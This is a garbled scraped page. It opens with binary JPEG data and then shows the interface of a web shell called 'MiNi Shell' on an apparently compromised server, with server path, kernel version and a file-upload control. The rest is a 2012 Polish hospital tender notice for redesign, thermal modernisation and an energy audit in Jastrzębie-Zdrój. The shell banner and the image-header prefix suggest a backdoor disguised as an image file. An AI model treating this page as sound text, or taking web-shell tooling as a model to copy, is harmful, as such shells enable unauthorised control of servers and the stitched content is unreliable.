JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120813/299286-N-2012.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Wykonanie dokumentacji projektowej  przebudowy w tym termomodernizacji obiektu Wojewódzkiego Szpitala Specjalistycznego Nr 2 w Jastrzębiu-Zdroju  przy ul. Krasickiego 21 i nowej lokalizacji Oddziału Pediatrycznego w budynku przy Al. Jana Pawła II 7 wraz z opracowaniem wniosków o dofinansowanie przedsięwzięcia, audytu energetycznego . DZP /38/382- 51/12</b><br>
<b>Numer ogłoszenia: 299286 - 2012; data zamieszczenia: 13.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny Nr 2 w Jastrzębiu Zdroju , al. Jana Pawła II 7, 44-335 Jastrzębie-Zdrój, woj. śląskie, tel. 32 47 84 200, faks 32 47 84 506.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wss2.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej  przebudowy w tym termomodernizacji obiektu Wojewódzkiego Szpitala Specjalistycznego Nr 2 w Jastrzębiu-Zdroju  przy ul. Krasickiego 21 i nowej lokalizacji Oddziału Pediatrycznego w budynku przy Al. Jana Pawła II 7 wraz z opracowaniem wniosków o dofinansowanie przedsięwzięcia, audytu energetycznego . DZP /38/382- 51/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wykonanie dokumentacji projektowej przebudowy w tym termomodernizacji obiektu Wojewódzkiego Szpitala Specjalistycznego Nr 2 w Jastrzębiu-Zdroju przy ul. Krasickiego 21 i nowej lokalizacji Oddziału Pediatrycznego w budynku przy Al. Jana Pawła II 7 wraz z opracowaniem wniosków o dofinansowanie przedsięwzięcia, audytu energetycznego.(znak sprawy: DZP/38/382-51/12). Szczegółowy opis oraz zakres przedmiotu zamówienia określa Załącznik nr 1 do SIWZ- formularz asortymentowo-cenowy, opis przedmiotu zamówienia.Zamawiający zaleca Wykonawcy dokonanie wizji lokalnej w siedzibie Zamawiającego, aby uzyskał na swoją odpowiedzialność, koszt i ryzyko wszelkie niezbędne i istotne informacje, które mogą być konieczne dla celów przygotowania oferty i podpisania umowy. Zamiar dokonania wizji lokalnej przez Wykonawcę w siedzibie Zamawiającego powinien być wcześniej uzgodniony z Zamawiającym. Wizja lokalna będzie przeprowadzana w obecności Wykonawcy oraz dwóch członków komisji przetargowej Zamawiającego. Z przeprowadzonej wizji lokalnej będzie sporządzony protokół dokonania wizji lokalnej.Wykonawca zobowiązany jest znać wszelkie przepisy, które są w jakikolwiek sposób związane z projektowaniem i będzie w pełni odpowiedzialny za przestrzeganie tych praw, przepisów i wytycznych.Wykonawca przy realizacji przedmiotu zamówienia będzie postępował zgodnie z następującymi przepisami prawa:
a)Ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (tekst jednolity Dz. U. z r. Nr 243, poz. 1623 ze zm.),
b)Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. Nr 202, poz. 2072 ze zm.),
c)Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130, poz. 1389 ze zm.),
d)Rozporządzeniem Ministra Zdrowia z dnia 10 listopada 2006 r. w sprawie wymagań, jakimi powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. z 2006 r. Nr 213, poz. 1568 ze zm.),
e)innymi aktami prawnymi aktualnie obowiązującymi. Wykonawca będzie na bieżąco ustalał wszelką zmianę kolorystyki za wykonanie dokumentacji projektowej przedmiotu zamówienia z Zamawiającym. Wykonawca pod żadnym pozorem nie może podjąć samodzielnie decyzji w zakresie estetyki wykonania przedmiotu zamówienia.
Ogólne Wymagania dotyczące wykonania przedmiotu zamówienia oraz obowiązki Wykonawcy/
Zakres dokumentacji projektowej
Dokumentacja powinna być kompletna, obejmować projekty budowlane, projekty wykonawcze, przedmiary robót, kosztorysy inwestorskie, specyfikację techniczną wykonania i odbioru robót budowlanych, informacje dotyczącą bezpieczeństwa i ochrony zdrowia oraz wszelkie niezbędne pozwolenia, uzgodnienia i opinie, dokumenty konieczne do zatwierdzenia dokumentacji i uzyskania decyzji o pozwolenia na budowę. Zakres dokumentacji powinien obejmować przebudowę wszystkich budynków wchodzących w skład Szpitala przy ul. Krasickiego oraz części oddziału Rehabilitacji w budynku przy Al. Jana Pawła II 7.  W obiekcie przy ul. Krasickiego należy uwzględnić niezbędne roboty budowlane i instalacyjne, również rozdzielnię główną elektryczną z agregatem prądotwórczym, rezerwowy zbiornik wody, hydroforownię, rurociąg zimnej wody łączący zbiornik z pomieszczeniem hydroforów, instalację wodną p.poż zewnętrzną, naprawę nawierzchni chodników i dróg wewnętrznych.  
-  Oddział Pediatrii.
Oddział należy zlokalizować na pierwszym piętrze budynku łóżkowego Szpitala przy Al. Jana Pawła II 7 (aktualnie jest tam część Oddziału Rehabilitacji). Dostępna powierzchnia użytkowa: ok. 400 m2. Oddział powinien mieć ok. 18 łóżek (razem z izolatką).  Ilość łóżek dla dzieci młodszych: 13. Ilość łóżek dla dzieci starszych: 5. Przewidzieć pobyt matki z dzieckiem na sali chorych (dot. dzieci młodszych). Standard pokoi chorych: pokoje z łazienkami.
- Budynek szpitala przy ul. Krasickiego w Jastrzębiu-Zdroju.
W budynku tym należy zaprojektować następujące funkcje:
Zakład Pielęgnacyjno-Opiekuńczy: 54 łóżka. 
Zakład Opiekuńczo-Leczniczy: 32 łóżek.
Oddział Rehabilitacji obejmujący rehabilitację ogólnoustrojową, neurologiczną oraz kardiologiczną: 50 łóżek. Standard pokoi uzależniony od dostępnej powierzchni, tam gdzie to możliwe i uzasadnione przewidzieć pokoje z łazienkami.
Część praktyczną Oddziału Rehabilitacji obejmującą: wodolecznictwo, kinezoterapię, magnetoterapię, laseroterapię, fizykoterapię, masaż, krioterapię, terapię zajęciową.

Uwaga. Podane ilości łóżek są szacunkowe i mogą ulec zmianie.  

- Termomodernizacja budynków Szpitala przy ul. Krasickiego. 
Zakres: docieplenie elewacji budynków i dachów, wymiana stolarki zewnętrznej.
Zabudowa kolektorów słonecznych oraz oświetlenia energooszczędnego. Zakres jest uzależniony od zakresu zadań wskazanych do realizacji w audycie energetycznym. 

- Wykonanie audytu energetycznego budynków Szpitala przy ul. Krasickiego, Opracowanie wniosków o dofinansowanie (dotacja i pożyczka)  termomodernizacji do Narodowego funduszu Ochrony Środowiska  i Gospodarki Wodnej. 
- Opracowanie wniosków o dofinansowanie przedsięwzięcia z Norweskiego Mechanizmu Finansowego  (Funduszy Norweskich).
Zgodnie z art. 36 ust. 4 Prawa zamówień publicznych w ofercie należy wskazać część zamówienia, której wykonanie ma wykonać podwykonawca - stosowną deklarację do wypełnienia przez wykonawcę zawarto w Formularzu oferty, stanowiącym Załącznik nr 2 do SIWZ.Zamawiający nie dopuszcza możliwości składania ofert wariantowych.Zamawiający nie dopuszcza możliwości składania ofert równoważnych.Zamawiający nie dopuszcza możliwość składania ofert częściowych.Zamawiający nie przewiduje udzielenia zamówień uzupełniających.Zamawiający nie zamierza wybierać najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.Zamawiający nie przewiduje zawarcia umowy ramowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się doświadczeniem w realizacji dokumentacji projektowej i wykaże, że w ciągu ostatnich 3 lat przed upływem składania ofert, a jeżeli okres prowadzonej działalności jest krótszy w tym okresie wykonał
- co najmniej dwie dokumentacje projektowe dot. przebudowy i kompleksowej modernizacji szpitali  o wartości min 100 000,00 zł brutto każda. Załącznik 6 a
- co najmniej jednego wniosku o dotację i pożyczkę, które uzyskały dofinansowanie w ramach  konkursu Programu priorytetowego System zielonych inwestycji (GIS - Greek Investment Scheme) Część 1) Zarządzanie energią w budynkach użyteczności publicznej (zwany dalej GIS) w tym, w zakresie merytorycznym montaż instalacji solarnych Załącznik 6 b</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje, że dysponuje lub będzie dysponował
- co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej
- co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno  budowlanej
 - co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci
 - co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacji i urządzeń cieplnych 
- co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności wentylacyjnych
- co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności gazowych
- co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności wodociągowych kanalizacyjnych
- co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci
 - co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacji i urządzeń elektrycznych i elektroenergetycznych
- co najmniej 1 osobą posiadającą uprawnienia audytora energetycznego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi opłacona polisę OC, a przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę 80 000,00 zł złożonej oferty brutto ważną  na cały okres trwania zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wypełniony Formularz asortymentowo- cenowy/Opis przedmiotu zamówienia 
- wypełniony Formularz oferty - według Załącznika nr 2
- polisa ubezpieczeniowa
- pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia - konsorcjum, spółka cywilna) umocowanie może wynikać z treści umowy konsorcjum lub treści umowy spółki cywilnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)w zakresie innych podmiotów na zasobach, których wykonawca się opierał wykazując spełnienie warunków udziału w postępowaniu, a podwykonawca wykaże spełnienie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania dotychczasowy podwykonawca,
b)w zakresie podwykonawców, wykazanych na etapie złożonej oferty lub, których konieczność ujawnienia wynikła na etapie realizacji zamówienia, którym wykonawca powierzył lub ma zamiar powierzyć wykonanie części zamówienia,
c)w zakresie osób posiadających wymagane uprawnienia w przypadku zaistnienia zdarzeń losowych (w takim przypadku wykonawca zobowiązany będzie do zaproponowania osoby legitymującej się uprawnieniami wymaganymi specyfikacji istotnych warunków zamówienia),
d)	wystąpi konieczność wprowadzenia innych zmian, które są niezbędne do wykonania umowy, a których nie dało się przewidzieć w chwili zawarcia umowy oraz nie są zmianami istotnych postanowień umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wss2.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny Nr 2 w Jastrzębiu- Zdroju, Al.Jana Pawła II 7 ,44-330 Jastrzębie-Zdrój.Dział Zamówień Publicznych, XI piętro, pokój 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2012 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny Nr 2 w Jastrzębiu- Zdroju, Al.Jana Pawła II 7 ,44-330 Jastrzębie-Zdrój.Oferty należy składać w sekretariacie Zamawiającego I piętro pokój A1 w godz 7.25 do 15.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com